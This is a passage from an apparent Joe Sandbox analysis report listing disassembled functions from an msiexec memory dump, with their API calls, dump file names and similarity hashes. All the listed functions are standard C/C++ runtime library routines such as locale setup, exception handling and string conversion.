                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 06187D7D
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06187DA9
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 06187DE8
                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06187E05
                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 06187E44
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06187E61
                                                                                                                                                                                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 06187EA3
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 06187EC6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2040435927-0
                                                                                                                                                                                                                                • Opcode ID: f8b87e44b5a73667a8597e1678cdf7bdd6826415b9b922d1515685604999feb5
                                                                                                                                                                                                                                • Instruction ID: 9741e6fde75df2843f78ab1d8f8d867e285ac4d6091f3ff676a8b8ba29d9ea9f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b87e44b5a73667a8597e1678cdf7bdd6826415b9b922d1515685604999feb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26518C7290020AAFEBA0AF65CC44FEF7BA9EB40750F254925FE15E6190E7709C50CFA0
                                                                                                                                                                                                                                Function 0618B8D8 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 0618B9F7
                                                                                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0618BB05
                                                                                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 0618BC72
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                • API String ID: 1206542248-393685449
                                                                                                                                                                                                                                • Opcode ID: 839334a9b64542af61e0439070bf5915f148cec5de30f77a046fd35d7bd1629c
                                                                                                                                                                                                                                • Instruction ID: edce896a424e28785894ebb01b82589f7d6e95b00719dec10e8f6dc517f1a571
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 839334a9b64542af61e0439070bf5915f148cec5de30f77a046fd35d7bd1629c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7B16C71C08209EFCFA9EFA8C8809AEBBB5FF44310F14455AE8256B216D731DA51CF91
                                                                                                                                                                                                                                Function 061821E0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06182263
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 061822AF
                                                                                                                                                                                                                                • __Getctype.LIBCPMT ref: 061822C8
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 061822E4
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06182379
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                                                                • API String ID: 1840309910-1405518554
                                                                                                                                                                                                                                • Opcode ID: 7e43e4c5cf5453de229c544a4a298de13f3f7a8457e00edb47320af5e39ad40e
                                                                                                                                                                                                                                • Instruction ID: 9cbdb40e3cb7d2a500daea9215ee47115295e75893ae794dde9e27a205988fc0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e43e4c5cf5453de229c544a4a298de13f3f7a8457e00edb47320af5e39ad40e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9517FB1D00348AFDB91EFA4DD45B9EBBB8AF54700F144129EC15A7280E735AA09CFA1
                                                                                                                                                                                                                                Function 06194376 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,06194485,061819F7,?,00000000,?,?,?,06194652,00000022,FlsSetValue,061A43A4,ccs,?), ref: 06194437
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                • Opcode ID: d7e6e2804e963bebeee54f11fb59cff5cffecb73c15e57fd148edd1241715e21
                                                                                                                                                                                                                                • Instruction ID: 0d247adea5bb62528fe0c89bbc48e4907b1a0f48d87e6921b71f20c76fbcaeda
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e6e2804e963bebeee54f11fb59cff5cffecb73c15e57fd148edd1241715e21
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3421B776E11211ABDFA19F25AC41A5A77E9AF45770F154120EE15E7280D730EE02CEF0
                                                                                                                                                                                                                                Function 0619576A Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 847882c46909deb309b187557113b1d39e8793898e48bcb6b393ecc32926fd9b
                                                                                                                                                                                                                                • Instruction ID: 09e17ec107657090df125b1be06212783b4030ada5d72475e9ce531d7f4ebd8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 847882c46909deb309b187557113b1d39e8793898e48bcb6b393ecc32926fd9b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58B11470E00249AFDF96DFA9D880BADBBB6BF85310F144158E911AB291C7709942CFB5
                                                                                                                                                                                                                                Function 06186250 Relevance: 9.2, APIs: 6, Instructions: 162COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06182620: ___std_exception_copy.LIBVCRUNTIME ref: 061826BF
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: __EH_prolog3.LIBCMT ref: 061875F5
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: std::_Lockit::_Lockit.LIBCPMT ref: 06187600
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: std::locale::_Setgloballocale.LIBCPMT ref: 0618761B
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: _Yarn.LIBCPMT ref: 06187631
                                                                                                                                                                                                                                  • Part of subcall function 061875EE: std::_Lockit::~_Lockit.LIBCPMT ref: 0618766E
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0618631F
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06186343
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06186364
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 061863D6
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 061863F2
                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 06186458
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3RegisterSetgloballocaleYarn___std_exception_copystd::locale::_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2413194342-0
                                                                                                                                                                                                                                • Opcode ID: 4ac83c94131e2a5251306645283e55cdd6482ca8a43a02e3970a815c279e4746
                                                                                                                                                                                                                                • Instruction ID: 7a291d6e7fa852b6db0c8075c166fdc7cca349549805fbf8a86e63c7404fad7a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ac83c94131e2a5251306645283e55cdd6482ca8a43a02e3970a815c279e4746
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA618CB0D006059FDB91EF64D984BAEBBF1FF48310F204619E819AB680D771AA44CFE1
                                                                                                                                                                                                                                Function 061866A0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 061866D6
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 061866F9
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06186719
                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0618678B
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 061867A3
                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 061867C6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2081738530-0
                                                                                                                                                                                                                                • Opcode ID: 0c501fadb14ac045d8de86d8841afdc791a516378b8187f832b2592b5c2084e1
                                                                                                                                                                                                                                • Instruction ID: 77c1390ed90a9923247fe0c5913666f681a711b68a4f2482029af0d09b6f3bad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c501fadb14ac045d8de86d8841afdc791a516378b8187f832b2592b5c2084e1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C41BB71D006198FCB91EFA4D980AAEBBB1FF44724F240259D925A7380D734A944CFD1
                                                                                                                                                                                                                                Function 0618B56A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0618B561,0618952E,06188D82), ref: 0618B578
                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0618B586
                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0618B59F
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,0618B561,0618952E,06188D82), ref: 0618B5F1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                • Opcode ID: 6ef02a2eb320447ce75b2d9921b3dae38361d15a76f7ac79e90cf66cf397978e
                                                                                                                                                                                                                                • Instruction ID: 58b7e4d683abfad29366c084129f84f5bddb0e87ddc5f8e4368153c5bd674f49
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef02a2eb320447ce75b2d9921b3dae38361d15a76f7ac79e90cf66cf397978e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5301F776A1C313AEA7E436B4FD8561A2745EB81378B210339EA30E11E0FF114C90DDD4
                                                                                                                                                                                                                                Function 06186BE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06186C52
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 06186C9E
                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 06186CBD
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 06186D52
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: std::_$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                • String ID: bad locale name
                                                                                                                                                                                                                                • API String ID: 1143662833-1405518554
                                                                                                                                                                                                                                • Opcode ID: 8d452cb376354044b67b8c99be93dd40e20b4a21a1116190b542dbb119bbb4f8
                                                                                                                                                                                                                                • Instruction ID: a3622cc5f6c8d441992169d8be7ae1c5b668bd2390a036be42239122596da4f2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d452cb376354044b67b8c99be93dd40e20b4a21a1116190b542dbb119bbb4f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2413DB1D00248AFEF90EFA4DD85B9EBBB8AF14314F244169E814A7281E775D904CFE1
                                                                                                                                                                                                                                Function 0618F8E7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E8B440B6,?,?,00000000,0619FD10,000000FF,?,0618F8C3,?,?,0618F897,00000016), ref: 0618F91C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0618F92E
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,0619FD10,000000FF,?,0618F8C3,?,?,0618F897,00000016), ref: 0618F950
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 82208d0971c968130c23fdb811f03159978ce9d9e5e661e75a994f33063583cd
                                                                                                                                                                                                                                • Instruction ID: cda6d96df929a801905fcaba0be575b803b4ca8989d6859bcd8cbcb6da3a22fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82208d0971c968130c23fdb811f03159978ce9d9e5e661e75a994f33063583cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA014F75D04669BFDB129F50DD0ABBEBBB9FB04B54F004526F911E2380DB749944CE90
                                                                                                                                                                                                                                Function 06196D65 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06196DEA
                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 06196EB3
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 06196F1A
                                                                                                                                                                                                                                  • Part of subcall function 06195D59: HeapAlloc.KERNEL32(00000000,?,?,?,06189307,?,?,?,E8B440B6,?,061819F7,?,?,?), ref: 06195D8B
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 06196F2D
                                                                                                                                                                                                                                • __freea.LIBCMT ref: 06196F3A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1096550386-0
                                                                                                                                                                                                                                • Opcode ID: ca7d8b7a3831a9bb2624e404610886fd997b7e46ae2d1631802c888a7d6bc236
                                                                                                                                                                                                                                • Instruction ID: 5cf7ad298c896273e12b9204a0f6727f9a800e0909f14398f29ccf984965cc17
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca7d8b7a3831a9bb2624e404610886fd997b7e46ae2d1631802c888a7d6bc236
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A351B372A10206AFFFA59F65CC90EBB7AA9EF84658B150529FD14D6250FB31DC10CAF0
                                                                                                                                                                                                                                Function 061875EE Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 061875F5
                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 06187600
                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0618766E
                                                                                                                                                                                                                                  • Part of subcall function 06187751: std::locale::_Locimp::_Locimp.LIBCPMT ref: 06187769
                                                                                                                                                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 0618761B
                                                                                                                                                                                                                                • _Yarn.LIBCPMT ref: 06187631
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1088826258-0
                                                                                                                                                                                                                                • Opcode ID: 209d53c41068a053ba190d3b2c696329ae7a1865b3f28d628edb325f0de561cd
                                                                                                                                                                                                                                • Instruction ID: 4281697e267774bf48cd119178adb1d98f6cefca861c7e046d4944b7f446bcc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 209d53c41068a053ba190d3b2c696329ae7a1865b3f28d628edb325f0de561cd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27015A79A00A11AFDB86FB20998497C7BB2FFC5250B340049E92657380CB34AA42CFD1
                                                                                                                                                                                                                                Function 06182620 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 061826BF
                                                                                                                                                                                                                                  • Part of subcall function 06189540: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,E8B440B6,?,?,0618743C,?,061A9F00,?), ref: 061895A0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
